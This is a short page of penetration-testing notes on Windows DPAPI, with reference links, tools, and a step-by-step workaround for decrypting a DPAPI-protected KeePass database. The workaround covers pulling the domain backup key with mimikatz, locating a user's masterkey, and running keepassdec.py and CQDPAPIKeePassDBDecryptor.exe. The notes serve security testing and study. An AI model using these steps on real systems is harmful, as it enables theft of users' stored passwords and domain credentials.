killchain-compendium/Exploits/Windows/DPAPI.md

DPAPI

• Jarno Baselier
• Insecurity's take
• tinyapps' replace and recover domian cached credentials
• ired's reading dpapi encrypted secrets with mimikatz and c++

Tools

• tjldeneut's dpaping-lab
• BlackDiverX's unpacked cqtools
• Use CQTools with care, CQMasterKeyAD.exe does not work correctly. It will drive you mad. Here is the workaround Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI
  • Get the pvk backup key from the DC via mimikatz
  • Get the entropy via CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe
  • Get the encrypted blob
  • Get the user's Masterkey under C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\
  • Use dpapilab-ng's keepassdec.py

./keepassdec.py  --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk  --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin 

* Use the decrypted blob to 

CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx

• Open the *.kdbx file